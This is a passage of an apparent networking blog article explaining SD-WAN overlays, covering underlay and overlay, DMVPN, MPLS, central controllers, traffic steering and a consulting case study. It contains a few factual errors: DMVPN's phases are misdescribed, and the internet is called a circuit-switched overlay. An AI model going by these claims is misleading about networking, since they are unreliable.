Policy-based overlays enable organizations to define rules and policies that govern the behavior of the SD-WAN network. These overlays use intelligent routing algorithms to dynamically select the most optimal path for network traffic based on predefined policies. By leveraging policy-based overlays, businesses can ensure efficient utilization of network resources, minimize latency, and improve overall network performance.

4. Hybrid Overlays:

Hybrid overlays combine the benefits of both public and private networks. This overlay allows organizations to utilize multiple network connections, including MPLS, broadband, and LTE, to create a robust and resilient network infrastructure. Hybrid overlays intelligently route traffic through the most suitable connection based on application requirements, network availability, and cost. By leveraging mixed overlays, businesses can achieve high availability, cost-effectiveness, and improved application performance.

5. Cloud-Enabled Overlays:

As more businesses adopt cloud-based applications and services, seamless connectivity to cloud environments becomes crucial. Cloud-enabled overlays provide direct and secure connectivity between the SD-WAN network and cloud service providers. These overlays ensure optimized performance for cloud applications by minimizing latency and providing efficient data transfer. Cloud-enabled overlays simplify the management and deployment of SD-WAN in multi-cloud environments, making them an ideal choice for businesses embracing cloud technologies.

Related: For additional pre-information, you may find the following helpful:

  1. Transport SDN
  2. SD WAN Diagram 
  3. Overlay Virtual Networking



SD-WAN Overlay

Key SD WAN Overlay Discussion Points:


  • WAN transformation.

  • The issues with traditional networking.

  • Introduction to Virtual WANs.

  • SD-WAN and SDN discussion.

  • SD-WAN overlay core features.

  • Drivers for SD-WAN.

 

Back to Basics: SD-WAN Overlay

Overlay Networking

Overlay networking is an approach to computer networking that involves building a layer of virtual networks on top of an existing physical network. This approach improves the scalability, performance, and security of the underlying infrastructure. It also allows for creating virtual networks that span multiple physical networks, allowing for greater flexibility in traffic routes.

At the core of overlay networking is the concept of virtualization. This involves separating the physical infrastructure from the virtual networks, allowing greater control over allocating resources. This separation also allows the creation of virtual network segments that span multiple physical networks. This provides an efficient way to route traffic, as well as the ability to provide additional security and privacy measures.

The diagram below displays a VXLAN overlay. So, we are using VLXAN to create the tunnel that allows Layer 2 extensions across a Layer 3 core.

Overlay networking
Diagram: Overlay Networking with VXLAN

Underlay network

A network underlay is a physical infrastructure that provides the foundation for a network overlay, a logical abstraction of the underlying physical network. The network underlay provides the physical transport of data between nodes, while the overlay provides logical connectivity.

The network underlay can comprise various technologies, such as Ethernet, Wi-Fi, cellular, satellite, and fiber optics. It is the foundation of a network overlay and essential for the proper functioning of the network. It provides the transport of data and the physical connections between nodes. It also provides the physical elements that make up the infrastructure, such as routers, switches, and firewalls.

Overlay networking
Diagram: Overlay networking. Source Researchgate.

SD-WAN with SDWAN overlay.

SD-WAN leverages a transport-independent fabric technology that is used to connect remote locations. This is achieved by using overlay technology. The SDWAN overlay works by tunneling traffic over any transport between destinations within the WAN environment.

This gives authentic flexibility to routing applications across any network portion regardless of the circuit or transport type. This is the definition of transport independence. Having a fabric SDWAN overlay network means that every remote site, regardless of physical or logical separation, is always a single hop away from another.

SD-WAN overlays offer several advantages over traditional WANs, including improved scalability, reduced complexity, and better control over traffic flows. They also provide better security, as each site is protected by its dedicated security protocols. Additionally, SD-WAN overlays can improve application performance and reliability and reduce latency.

We need more bandwidth.

Modern businesses demand more bandwidth than ever to connect their data, applications, and services. As a result, we have many things to consider with the WAN, such as regulations, security, visibility, branch, data center sites, remote workers, internet access, cloud, and traffic prioritization. They were driving the need for SD-WAN.

The concepts and design principles of creating a wide area network (WAN) to provide resilient and optimal transit between endpoints have continuously evolved. However, the driver behind building a better WAN is to support applications that demand performance and resiliency.

SD WAN Overlay 

Key SD WAN Features

Full stack obervability 


Not all traffic treated equally

Combining all transports

Intelligent traffic steering 

Controller-based policy

Benefits of SD-WAN Overlay

Enhanced Performance: SD-WAN overlay leverages intelligent traffic routing algorithms and dynamic path selection to optimize network performance. It ensures critical applications receive the necessary bandwidth and prioritization, improving performance and user experience.

Increased Security: With the rise in cyber threats, security is a top concern for businesses. SD-WAN overlay provides enhanced security measures, including integrated firewall capabilities, secure VPN tunnels, and traffic segmentation. These features help protect sensitive data and prevent unauthorized access, ensuring a robust and secure network infrastructure.

Agility and Scalability: Traditional networks often struggle to adapt to changing business needs and scale effectively. SD-WAN overlay offers agility and scalability by enabling rapid deployment of new sites, simplifying network management, and providing flexibility in bandwidth allocation. It empowers businesses to scale their network infrastructure effortlessly as their requirements evolve.

Implementation Considerations

Network Assessment: A thorough network assessment is crucial before implementing the SD-WAN overlay. This includes evaluating existing network infrastructure, bandwidth requirements, application performance, and security protocols. A comprehensive assessment helps identify potential bottlenecks and ensures a smooth transition to the new technology.

Vendor Selection: Choosing the right SD-WAN overlay vendor is vital for a successful implementation. Factors to consider include scalability, security features, ease of management, and compatibility with existing network infrastructure. Evaluating multiple vendors and seeking recommendations from industry experts can help make an informed decision.

WAN Innovation

The WAN is the entry point between inside the perimeter and outside. An outage in the WAN has a large blast radius, affecting many applications and other branch site connectivity. Yet the WAN has had little innovation until now with the advent of both SD-WAN and SASE.  SASE is a combination of both network and security functions.

If you look at the history of WAN, you will see that there have been several stages in WAN virtualization. Most WAN transformation projects went from basic hub-and-spoke topologies based on services such as leased lines to fully meshed MPLS-based WAN servers. Cost was the main driver for this evolution, not agility.  

wide area network
Diagram: Wide Area Network: WAN Technologies.

Issues with the Traditional Network

As the world of I.T. becomes dispersed, the network and security perimeters dissolve and become less predictable. Before, it was easy to know what was internal and external, but now we live in a world of micro-perimeters with a considerable change in the focal point.

The perimeter is now the identity of the user and device – not the fixed point at an H.Q. site. As a result, applications require a WAN to support distributed environments, flexible network points, and a change in the perimeter design.

Suboptimal traffic flow

The optimal route will be the fastest or most efficient and, therefore, preferred to transfer data. Sub-optimal routes will be slower and, hence, not the selected route. Centralized-only designs resulted in suboptimal traffic flow and increased latency, which will degrade application performance.

A key point to note is that traditional networks focus on centralized points in the network that all applications, network, and security services must adhere to. These network points are fixed and cannot be changed.

Network point intelligence

However, the network should be evolved to have network points positioned where it makes the most sense for the application and user. Not based on, let’s say, a previously validated design for a different application era. For example, many branch sites do not have local Internet breakouts.

So, for this reason, we backhauled internet-bound traffic to secure, centralized internet portals at the H.Q. site. As a result, we sacrificed the performance of Internet and cloud applications. Designs that place the H.Q. site at the center of connectivity requirements inhibit the dynamic access requirements for digital business.

Hub and spoke drawbacks.

Simple spoke-type networks are sub-optimal because you always have to go to the center point of the hub and then out to the machine you need rather than being able to go directly to whichever node you need. As a result, the hub becomes a bottleneck in the network as all data must go through it. With a more scattered network using multiple hubs and switches, a less congested and more optimal route could be found between machines.

 

A key point on DMVPN as an overlay technology

DMVPN, an acronym for Dynamic Multipoint Virtual Private Network, is a Cisco proprietary solution that provides a scalable and flexible approach to creating virtual private networks over the Internet. Unlike traditional VPNs requiring point-to-point connections, DMVPN utilizes a hub-and-spoke architecture, allowing multiple remote sites to communicate securely.

How DMVPN Works

a) Phase 1: Establishing a mGRE (Multipoint GRE) Tunnel: DMVPN begins by creating a multipoint GRE tunnel, allowing spoke routers to connect to the hub router. This phase sets the foundation for secure communication.

b) Phase 2: Dynamic Routing Protocol Integration: Once the mGRE tunnel is established, a dynamic routing protocol, such as EIGRP or OSPF, propagates routing information. This allows spoke routers to learn about other remote networks dynamically.

c) Phase 3: IPSec Encryption: To ensure secure communication over the internet, IPSec encryption is applied to the DMVPN tunnels. This encryption provides confidentiality, integrity, and authentication, safeguarding data transmitted between sites.

DMVPN Phase 3
Diagram: DMVPN Phase 3 configuration

 

A key point on MPLS agility

Multiprotocol Label Switching, or MPLS, is a networking technology that routes traffic using the shortest path based on “labels,” rather than network addresses, to handle forwarding over private wide area networks. As a protocol-independent solution, MPLS assigns labels to each data packet, controlling the path the packet follows. As a result, MPLS significantly improves traffic speed, but it has some drawbacks.

MPLS VPN
Diagram: MPLS VPN

MPLS topologies, once they are provisioned, are challenging to modify. While community tagging and matching do provide some degree of flexibility and are commonly used, meaning the customers set BGP communities on prefixes for specific applications. The SP matches these communities and sets traffic engineering parameters like the MED and Local Preference. However, the network topology essentially remains fixed.

digital transformation
Diagram: Networking: The cause of digital transformation.

Connecting remote sites to cloud offerings, such as SaaS or IaaS, is far more efficient over the public Internet. However, there are many drawbacks to backhauling traffic to a central data center when it is not required, and it is more efficient to go direct. SD-WAN technologies share similar technologies to DMVPN phases, allowing your branch sites to go directly to cloud-based applications without backhauling to the central H.Q.

Introducing the SD-WAN Overlay

A software-defined wide area network is a wide area network that uses software-defined network technology, such as communicating over the Internet using SDWAN overlay tunnels that are encrypted when destined for internal organization locations. SD-WAN is software-defined networking for the wide area network.

SD-WAN decouples (separates) the WAN infrastructure, whether physical or virtual, from its control plane mechanism and allows applications or application groups to be placed into virtual WAN overlays.

Types of SD WAN and the SD WAN overlay: The virtual WANs 

The separation allows us to bring many enhancements and improvements to a WAN that has had very little innovation in the past compared to the rest of the infrastructure, such as server and storage modules. With server virtualization, several virtual machines create application isolation on a physical server.

For example, an application placed in a VM operated in isolation from each other, yet the VMs were installed on the same physical hosts.

Consider SD-WAN to operate with similar principles. Each application or group can operate independently when traversing the WAN to endpoints in the cloud or other remote sites. These applications are placed into a virtual SDWAN overlay.

Cisco SD WAN Overlay
Diagram: Cisco SD-WAN overlay. Source Network Academy

SD-WAN overlay and SDN combined

  • The Fabric

The word fabric comes from the fact that there are many paths to move from one server to another to ease balance and traffic distribution. SDN aims to centralize the order that enables the distribution of the flows over all the fabric paths. Then, we have an SDN controller device. The SDN controller can also control several fabrics simultaneously, managing intra and inter-datacenter flows.

  • SD-WAN overlay includes SDN

SD-WAN is used to control and manage a company’s multiple WANs. There are different types of WAN: Internet, MPLS, LTE, DSL, fiber, wired network, circuit link, etc. SD-WAN uses SDN technology to control the entire environment. Like SDN, the data plane and control plane are separated. A centralized controller must be added to manage flows, routing or switch policies, packet priority, network policies, etc. SD-WAN technology is based on overlay, meaning nodes representing underlying networks.

  • Centralized logic

In a traditional network, each device’s transport functions and controller layer are resident. This is why any configuration or change must be done box-by-box. Configuration was carried out manually or, at the most, an Ansible script. SD-WAN brings Software-Defined Networking (SDN) concepts to the enterprise branch WAN.

Software-defined networking (SDN) is an architecture, whereas SD-WAN is a technology that can be purchased and built on SDN’s foundational concepts. SD-WAN’s centralized logic stems from SDN. SDN separates the control from the data plane and uses a central controller to make intelligent decisions, similar to the design that most SD-WAN vendors operate.

  • A holistic view

The controller has a holistic view. Same with the SD-WAN overlay. The controller supports central policy management, enabling network-wide policy definitions and traffic visibility. The SD-WAN edge devices perform the data plane. The data plane is where the simple forwarding occurs, and the control plane, which is separate from the data plane, sets up all the controls for the data plane to forward.

Like SDN, the SD-WAN overlay abstracts network hardware into a control plane with multiple data planes to make up one large WAN fabric. As the control layer is abstracted and decoupled above the physicals and running in software, services can be virtualized and delivered from a central location to any point on the network.

sd-wan technology
Diagram: SD-WAN technology: The old WAN vs the new WAN.

Types of SD WAN and SD-WAN Overlay Features

Enterprises that employ SD-WAN solutions for their network architecture will simplify the complexity of their WAN. Enterprises should look at the SD-WAN options available in various deployment options, ranging from thin devices with most of the functionality in the cloud to thicker devices at the branch location performing most of the work. Whichever SD-WAN vendor you choose will have similar features.

Today’s WAN environment requires us to manage many elements: numerous physical components that include both network and security devices, complex routing protocols and configurations, complex high-availability designs, and various path optimizations and encryption techniques. 

Gaining the SD-WAN benefits

Employing the features discussed below will allow you to gain the benefits of SD-WAN: its higher capacity bandwidth, centralized management, network visibility, and multiple connection types. In addition, SD-WAN technology allows organizations to use connection types that are cheaper than MPLS.

virtual private network
Diagram: SD-WAN features: Virtual Private Network (VPN).

Types of SD WAN: Combining the transports

At its core, SD-WAN shapes and steers application traffic across multiple WAN means of transport. Building off the concept of link bonding to combine numerous means of transport and transport types, the SD-WAN overlay improves the concept by moving the functionality up the stack—first, SD-WAN aggregates last-mile services, representing them as a single pipe to the application.

SD-WAN allows you to combine all transport links into one big pipe. SD-WAN is transport agnostic. As it works by abstraction, it does not care what transport links you have. Maybe you have MPLS, private Internet, or LTE. It can combine all these or use them separately.

Types of SD WAN: Central location

From a central location, SD-WAN pulls all of these WAN resources together, creating one large WAN fabric that allows administrators to slice up the WAN to match the application requirements that sit on top. Different applications traverse the WAN, so we need the WAN to react differently.

For example, if you’re running a call center, you want a low delay, latency, and high availability with Voice traffic. You may wish to this traffic to use an excellent service-level agreement path.

SD WAN traffic steering
Diagram: SD-WAN traffic steering. Source Cisco.

Types of SD WAN: Traffic steering

Traffic steering may also be required: voice traffic to another path if, for example, the first Path is experiencing high latency. If it’s not possible to steer traffic automatically to a link that is better performing, run a series of path remediation techniques to try to improve performance. File transfer differs from real-time Voice: you can tolerate more delay but need more B/W.

Here, you may want to use a combination of WAN transports ( such as customer broadband and LTE ) to achieve higher aggregate B/W. This also allows you to automatically steer traffic over different WAN transports when there is a deflagration on one link. With the SD-WAN overlay, we must start thinking about paths, not links.

SD-WAN overlay makes intelligent decisions

At its core, SD-WAN enables real-time application traffic steering over any link, such as broadband, LTE, and MPLS, assigning pre-defined policies based on business intent. Steering policies support many application types, making intelligent decisions about how WAN links are utilized and which paths are taken.

computer networking
Diagram: Computer networking: Overlay technology.

Types of SD WAN: Steering traffic

The concept of an underlay and overlay are not new, and SD-WAN borrows these designs. First, the underlay is the physical or virtual world, such as the physical infrastructure. Then we have the overlay, where all the intelligence can be set. The SDWAN overlay represents the virtual WANs that hold your different applications.

A virtual WAN overlay enables us to steer traffic and combine all bandwidths. Similar to how applications are mapped to V.M. in the server world, with SD-WAN, each application is mapped to its own virtual SD-WAN overlay. Each virtual SDWAN overlay can have its own SD WAN security policies, topologies, and performance requirements.

SD-WAN overlay path monitoring

SD-WAN monitors the paths and the application performance on each link (Internet, MPLS, LTE ) and then chooses the best path based on real-time conditions and the business policy. In summary, the underlay network is the physical or virtual infrastructure above which the overlay network is built. An SDWAN overlay network is a virtual network built on top of an underlying Network infrastructure/Network layer (the underlay).

Types of SD-WAN: Controller-based policy

An additional layer of information is needed to make more intelligent decisions about how and where to forward application traffic. This is the controller-based policy approach that SD-WAN offers, incorporating a holistic view.

A central controller can now make decisions based on global information, not solely on a path-by-path basis with traditional routing protocols.  Getting all the routing information and compiling it into the controller to make a decision is much more efficient than making local decisions that only see a limited part of the network.

The SD-WAN Controller provides physical or virtual device management for all SD-WAN Edges associated with the controller. This includes, but is not limited to, configuration and activation, IP address management, and pushing down policies onto SD-WAN Edges located at the branch sites.

 SD-WAN Overlay Case Study

I recently consulted for a private enterprise. Like many enterprises, they have many applications, both legacy and new. No one knew about courses and applications running over the WAN. Visibility was at an all-time low. For the network design, the H.Q. has MPLS and Direct Internet access.

So, there is nothing new here, and this design has been in place for the last decade. All traffic is backhauled to the HQ/MPLS headend for security screening. The H.Q. was where the security stack was located. This will include firewalls, IDS/IPS, and anti-malware. The remote sites have high latency and limited connectivity options.

 

types of sd wan
Diagram: WAN transformation: Network design.

More importantly, they are transitioning their ERP system to the cloud. As apps move to the cloud, they want to avoid fixed WAN, a big driver for a flexible SD-WAN solution. They also have remote branches. These branches are hindered by high latency and poorly managed IT infrastructure.

But they don’t want an I.T. representative at each site location. They have heard that SD-WAN has a centralized logic and can view the entire network from one central location. These remote sites must receive large files from the H.Q.; the branch sites’ transport links are only single-customer broadband links.

The cost of remote sites

Some remote sites have LTE, and the bills are getting more significant. The company wants to reduce costs with dedicated Internet access or customer/business broadband. They have heard that you can combine different transports with SD-WAN and have several path remediations on degraded transports for better performance. So, they decided to roll out SD-WAN. From this new architecture, they gained several benefits.

SD-WAN Visibility

When your business-critical applications operate over different provider networks, it gets harder to troubleshoot and find the root cause of problems. So, visibility is critical to business. SD-WAN allows you to see network performance data in real-time and is essential for determining where packet loss, latency, and jitter are occurring so you can resolve the problem quickly.

You also need to be able to see who or what is consuming bandwidth so you can spot intermittent problems. For all these reasons, SD-WAN visibility needs to go beyond network performance metrics and provide greater insight into the delivery chains that run from applications to users.

Understand your baselines

Visibility is needed to complete the network baseline before the SD-WAN is deployed. This enables the organization to understand existing capabilities, the norm, what applications are running, the number of sites connected, what service providers used, and whether they’re meeting their SLAs.

Visibility is a critical phase in getting a complete picture so teams understand how to optimize the infrastructure for the business. SD-WAN gives you an intelligent edge so you can see all the traffic and do something with the traffic immediately.

First, look at the visibility of the various flows, the links used, and any issues on those links. Then, if necessary, you can tweak the bonding policy to optimize the traffic flow. Before the rollout of SD-WAN, there was no visibility into the types of traffic, and different apps used what B.W. They had limited knowledge of WAN performance.

SD-WAN offers higher visibility

With SD-WAN, they have the visibility to control and class traffic on layer seven values, such as what URL you are using and what Domain you are trying to hit, along with the standard port and protocol.

All applications are not equal; some run better on different links. If a particular application is not performing correctly, you can route to a different circuit. With the SD-WAN orchestrator, you have complete visibility across all locations, all links, and into the different traffic across all circuits. 

SD-WAN High Availability

The goal of any high-availability solution is to ensure that all network services are resilient to failure. Such a solution aims to provide continuous access to network resources by addressing the potential causes of downtime through functionality, design, and best practices.

The previous high-availability design was active and passive with manual failover. It was hard to maintain, and there was a lot of unused bandwidth. Now, they have more efficient use of resources and are no longer tied to the bandwidth of the first circuit.

There is a better granular application failover mechanism. You can also select what apps are prioritized if there is a link failure or when a certain congestion ratio is hit. For example, you have LTE as a backup, which can be very expensive. So applications marked high priority are steered over the backup link, but guest WIFI traffic isn’t.  

Flexible topology

Before, they had a hub and spoke MPLS design for all applications. They wanted a complete mesh architecture for some applications, kept the existing hub, and spoke for others. However, the service provider couldn’t accommodate the level of granularity that they wanted.

Now, with SD-WAN, they can choose topologies that are better suited to the application type. As a result, the network design is now more flexible and matches the application than the application matching a network design it doesn’t want.

SD-WAN topology
Diagram: SD-WAN Topologies.

Going Deeper on the SD-WAN Overlay Components

SD-WAN combines transports, SDWAN overlay, and underlay

Look at it this way. With an SD-WAN topology, there are different levels of networking. There is an underlay network, the physical infrastructure, and an SDWAN overlay network. The physical infrastructure is the router, switches, and WAN transports; the overlay network is the virtual WAN overlays.

The SDWAN overlay presents a different network to the application. For example, the voice overlay will see only the voice overlay. The logical virtual pipe the overlay creates, and the application sees differs from the underlay.

An SDWAN overlay network is a virtual or logical network created on top of an existing physical network. The internet, which connects many nodes via circuit switching, is an example of an SDWAN overlay network. An overlay network is any virtual layer on top of physical network infrastructure.

Consider an SDWAN overlay as a flexible tag.

This may be as simple as a virtual local area network (VLAN) but typically refers to more complex virtual layers from an SDN or an SD-WAN). Think of an SDWAN overlay as a tag so that building the overlays is not expensive or time-consuming. In addition, you don’t need to buy physical equipment for each overlay as the overlay is virtualized and in the software.

Similar to software-defined networking (SDN), the critical part is that SD-WAN works by abstraction. All the complexities are abstracted into application overlays. For example, application type A can use this SDWAN overlay, and application type B can use that SDWAN overlay. 

I.P. and port number, orchestrations, and end-to-end

Recent application requirements drive a new type of WAN that more accurately supports today’s environment with an additional layer of policy management. The world has moved away from looking at I.P. addresses and Port numbers used to identify applications and made the correct forwarding decision. 

Types of SD WAN

The market for branch office wide-area network functionality is shifting from dedicated routing, security, and WAN optimization appliances to feature-rich SD-WAN. As a result, WAN edge infrastructure now incorporates a widening set of network functions, including secure routers, firewalls, SD-WAN, WAN path control, and WAN optimization, along with traditional routing functionality. Therefore, consider the following approach to deploying SD-WAN.

SD WAN Overlay Approach

SD WAN Feature

 Application-orientated WAN

Holistic visibility and decisions

Central logic

Independent topologies

Application mapping

1. Application-based approach

With SD-WAN, we are shifting from a network-based approach to an application-based approach. The new WAN no longer looks solely at the network to forward packets. Instead, it looks at the business requirements and decides how to optimize the application with the correct forwarding behavior. This new way of forwarding would be problematic when using traditional WAN architectures.

Making business logic decisions with I.P. and port number information is challenging. Standard routing is the most common way to forward application traffic today, but it only assesses part of the picture when making its forwarding decision. 

These devices have routing tables to perform forwarding. Still, with this model, they operate and decide on their little island, losing the holistic view required for accurate end-to-end decision-making.  

2. SD-WAN: Holistic decision

The WAN must start to make decisions holistically. The WAN should not be viewed as a single module in the network design. Instead, it must incorporate several elements it has not incorporated to capture the correct per-application forwarding behavior. The ideal WAN should be automatable to form a comprehensive end-to-end solution centrally orchestrated from a single pane of glass.

Managed and orchestrated centrally, this new WAN fabric is transport agnostic. It offers application-aware routing, regional-specific routing topologies, encryption on all transports regardless of link type, and high availability with automatic failover. All of these will be discussed shortly and are the essence of SD-WAN.  

3. SD-WAN and central logic        

Besides the virtual SD-WAN overlay, another key SD-WAN concept is centralized logic. Upon examining a standard router, local routing tables are computed from an algorithm to forward a packet to a given destination.

It receives routes from its peers or neighbors but computes paths locally and makes local routing decisions. The critical point to note is that everything is calculated locally. SD-WAN functions on a different paradigm.

Rather than using distributed logic, it utilizes centralized logic. This allows you to view the entire network holistically and with a distributed forwarding plane that makes real-time decisions based on better metrics than before.

This paradigm enables SD-WAN to see how the flows behave along the path. This is because they are taking the fragmented control approach and centralizing it while benefiting from a distributed system. 

The SD-WAN controller, which acts as the brain, can set different applications to run over different paths based on business requirements and performance SLAs, not on a fixed topology. So, for example, if one path does not have acceptable packet loss and latency is high, we can move to another path dynamically.

4. Independent topologies

SD-WAN has different levels of networking and brings the concepts of SDN into the Wide Area Network. Similar to SDN, we have an underlay and an overlay network with SD-WAN. The WAN infrastructure, either physical or virtual, is the underlay, and the SDWAN overlay is in software on top of the underlay where the applications are mapped.

This decoupling or separation of functions allows different application or group overlays. Previously, the application had to work with a fixed and pre-built network infrastructure. With SD-WAN, the application can choose the type of topology it wants, such as a full mesh or hub and spoke. The topologies with SD-WAN are much more flexible.

A key point: SD-WAN abstracts the underlay

With SD-WAN, the virtual WAN overlays are abstracted from the physical device’s underlay. Therefore, the virtual WAN overlays can take on topologies independent of each other without being pinned to the configuration of the underlay network. SD-WAN changes how you map application requirements to the network, allowing for the creation of independent topologies per application.

For example, mission-critical applications may use expensive leased lines, while lower-priority applications can use inexpensive best-effort Internet links. This can all change on the fly if specific performance metrics are unmet.

Previously, the application had to match and “fit” into the network with the legacy WAN, but with an SD-WAN, the application now controls the network topology. Multiple independent topologies per application are a crucial driver for SD-WAN.

types of sd wan
Diagram: SD-WAN Link Bonding.

5. The SD-WAN overlay

SD-WAN optimizes traffic over multiple available connections. It dynamically steers traffic to the best available link. Suppose the available links show any transmission issues. In that case, it will immediately transfer to a better path or apply remediation to a link if, for example, you only have a single link. SD-WAN delivers application flows from a source to a destination based on the configured policy and best available network path. A core concept of SD-WAN is overlaid.

SD-WAN solutions provide the software abstraction to create the SD-WAN overlay and decouple network software services from the underlying physical infrastructure. Multiple virtual overlays may be defined to abstract the underlying physical transport services, each supporting a different quality of service, preferred transport, and high availability characteristics.

6. Application mapping

Application mapping also allows you to steer traffic over different WAN transports. This steering is automatic and can be implemented when specific performance metrics are unmet. For example, if Internet transport has a 15% packet loss, the policy can be set to steer all or some of the application traffic over to better-performing MPLS transport.

Applications are mapped to different overlays based on business intent, not infrastructure details like IP addresses. When you think about overlays, it’s common to have, on average, four overlays. For example, you may have a gold, platinum, and bronze SDWAN overlay, and then you can map the applications to these overlays.

The applications will have different networking requirements, and overlays allow you to slice and dice your network if you have multiple application types. 

SDWAN Overlau
Diagram: Technology design: SDWAN overlay application mapping.

SD-WAN & WAN metrics

SD-WAN captures metrics that go far beyond the standard WAN measurements. For example, the traditional way would measure packet loss, latency, and jitter metrics to determine path quality. These measurements are insufficient for routing protocols that only make the packet flow decision at layer 3 of the OSI model.

As we know, layer 3 of the OSI model lacks intelligence and misses the overall user experience. Rather than relying on bits, bytes jitter, and latency, we must start to look at the application transactions.

SD-WAN incorporates better metrics that go beyond those considered by a standard WAN edge router. These metrics may include application response time, network transfer, and service response time. Some SD-WAN solutions monitor each flow’s RTT, sliding windows, and ACK delays, not just the I.P. or TCP. This creates a more accurate view of the application’s performance.

SD-WAN Features and Benefits

      • Leverage all available connectivity types.

All SD-WAN vendors can balance traffic across all transports regardless of transport type, which can be done per flow or packet. This ensures that existing redundant links sitting idle are not being used. SD-WAN creates an active-active network and eliminates the need to use and maintain traditional routing protocols for active–standby setups.  

      • App-aware routing capabilities 

As we know, application visibility is critical to forward efficiently over either transport. Still, we also need to go one step further and examine deep inside the application and understand what sub-applications exist, such as determining Facebook chat over regular Facebook. This allows you to balance loads across the WAN based on sub-applications. 

      • Regional-specific routing topologies

Several topologies include a hub and spoke full mesh and Internet PoP topologies. Each organization will have different requirements for choosing a topology. For example, Voice should use a full mesh design, while data requires a hub and spoke connecting to a central data center.

As we are moving heavily into the use of cloud applications, local internet access/internet breakout is a better strategic option than backhauling traffic to a central site when it doesn’t need to. SD-WAN abstracts the details of WAN, enabling application-independent topologies. Each application can have its topology, and this can be dynamically changed. All of this is managed by an SD-WAN control plane.

      • Centralized device management & policy administration 

With the controller-based approach that SD-WAN has, you are not embedding the control plane in the network. This allows you to centrally provision and pushes policy down any instructions to the data plane from a central location. This simplifies management and increases scale. The manual box-by-box approach to policy enforcement is not the way forward.

The ability to tie everything to a template and automate enables rapid branch deployments, security updates, and other policy changes. It’s much better to manage it all in one central place with the ability to dynamically push out what’s needed, such as updates and other configuration changes. 

      • High availability with automatic failovers 

You cannot apply a single viewpoint to high availability. Many components are involved in creating a high availability plan, such as device, link, and site level’s high availability requirements; these should be addressed in an end-to-end solution. In addition, traditional WANs require additional telemetry information to detect failures and brown-out events. 

      • Encryption on all transports, irrespective of link type 

Regardless of link type, MPLS, LTE, or the Internet, we need the capacity to encrypt all those paths without the excess baggage and complications that IPsec brings. Encryption should happen automatically, and the complexity of IPsec should be abstracted.

Summary: SD WAN Overlay

In today’s digital landscape, businesses increasingly rely on cloud-based applications, remote workforces, and data-driven operations. As a result, the demand for a more flexible, scalable, and secure network infrastructure has never been greater. This is where SD-WAN overlay comes into play, revolutionizing how organizations connect and operate.

SD-WAN overlay is a network architecture that allows organizations to abstract and virtualize their wide area networks, decoupling them from the underlying physical infrastructure. It utilizes software-defined networking (SDN) principles to create an overlay network that runs on top of the existing WAN infrastructure, enabling centralized management, control, and optimization of network traffic.

Key benefits of SD-WAN overlay 

1. Enhanced Performance and Reliability:

SD-WAN overlay leverages multiple network paths to distribute traffic intelligently, ensuring optimal performance and reliability. By dynamically routing traffic based on real-time conditions, businesses can overcome network congestion, reduce latency, and maximize application performance. This capability is particularly crucial for organizations with distributed branch offices or remote workers, as it enables seamless connectivity and productivity.

2. Cost Efficiency and Scalability:

Traditional WAN architectures can be expensive to implement and maintain, especially when organizations need to expand their network footprint. SD-WAN overlay offers a cost-effective alternative by utilizing existing infrastructure and incorporating affordable broadband connections. With centralized management and simplified configuration, scaling the network becomes a breeze, allowing businesses to adapt quickly to changing demands without breaking the bank.

3. Improved Security and Compliance:

In an era of increasing cybersecurity threats, protecting sensitive data and ensuring regulatory compliance are paramount. SD-WAN overlay incorporates advanced security features to safeguard network traffic, including encryption, authentication, and threat detection. Businesses can effectively mitigate risks, maintain data integrity, and comply with industry regulations by segmenting network traffic and applying granular security policies.

4. Streamlined Network Management:

Managing a complex network infrastructure can be a daunting task. SD-WAN overlay simplifies network management with centralized control and visibility, enabling administrators to monitor and manage the entire network from a single pane of glass. This level of control allows for faster troubleshooting, policy enforcement, and network optimization, resulting in improved operational efficiency and reduced downtime.

5. Agility and Flexibility:

In today’s fast-paced business environment, agility is critical to staying competitive. SD-WAN overlay empowers organizations to adapt rapidly to changing business needs by providing the flexibility to integrate new technologies and services seamlessly. Whether adding new branch locations, integrating cloud applications, or adopting emerging technologies like IoT, SD-WAN overlay offers businesses the agility to stay ahead of the curve.

Implementation of SD-WAN Overlay:

Implementing SD-WAN overlay requires careful planning and consideration. The following steps outline a typical implementation process:

1. Assess Network Requirements: Evaluate existing network infrastructure, bandwidth requirements, and application performance needs to determine the most suitable SD-WAN overlay solution.

2. Design and Architecture: Create a network design incorporating SD-WAN overlay while considering factors such as branch office connectivity, data center integration, and security requirements.

3. Vendor Selection: Choose a reliable and reputable SD-WAN overlay vendor based on their technology, features, support, and scalability.

4. Deployment and Configuration: Install the required hardware or virtual appliances and configure the SD-WAN overlay solution according to the network design. This includes setting up policies, traffic routing, and security parameters.

5. Testing and Optimization: Thoroughly test the SD-WAN overlay solution, ensuring its compatibility with existing applications and network infrastructure. Optimize the solution based on performance metrics and user feedback.

Conclusion: SD-WAN overlay is a game-changer for businesses seeking to optimize their network infrastructure. By enhancing performance, reducing costs, improving security, streamlining management, and enabling agility, SD-WAN overlay unlocks the true potential of connectivity. Embracing this technology allows organizations to embrace digital transformation, drive innovation, and gain a competitive edge in the digital era. In an ever-evolving business landscape, SD-WAN overlay is the key to unlocking new growth opportunities and future-proofing your network infrastructure.